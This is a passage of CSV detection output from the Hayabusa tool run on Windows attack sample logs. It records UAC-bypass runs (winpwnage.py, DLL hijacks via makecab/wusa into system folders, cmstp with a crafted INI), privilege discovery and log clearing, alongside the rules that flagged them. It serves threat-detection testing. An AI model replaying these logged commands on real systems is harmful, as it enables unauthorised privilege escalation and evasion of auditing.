+00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.531 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 03:25:24.896 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 03:25:25.067 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 03:25:25.067 +00:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 12:21:57.077 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:02.434 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:02.434 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:08.465 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:08.465 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 13:32:48.200 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:32:48.412 +00:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:32:58.549 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:33:29.424 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 13:49:29.586 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:29.789 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:34.946 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:39.930 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:40.164 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:45.133 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 13:49:45.378 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 09:50:08.248 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:08.491 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:13.494 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:13.509 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:18.404 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:18.654 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:26.779 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:27.018 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 09:50:27.030 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 16:46:10.125 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:10.344 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:15.500 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:15.547 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:20.531 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:20.828 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:46:26.203 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-11 16:54:02.071 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:02.305 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:07.508 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:07.524 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:12.493 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:12.821 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 16:54:18.069 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-11 17:10:06.342 +00:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:10:10.889 +00:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-11 17:28:17.176 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:17.363 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:19.567 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:19.567 +00:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-11 17:28:22.598 +00:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,rules/sigma/registry_sysmon/registry_event/registry_event_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 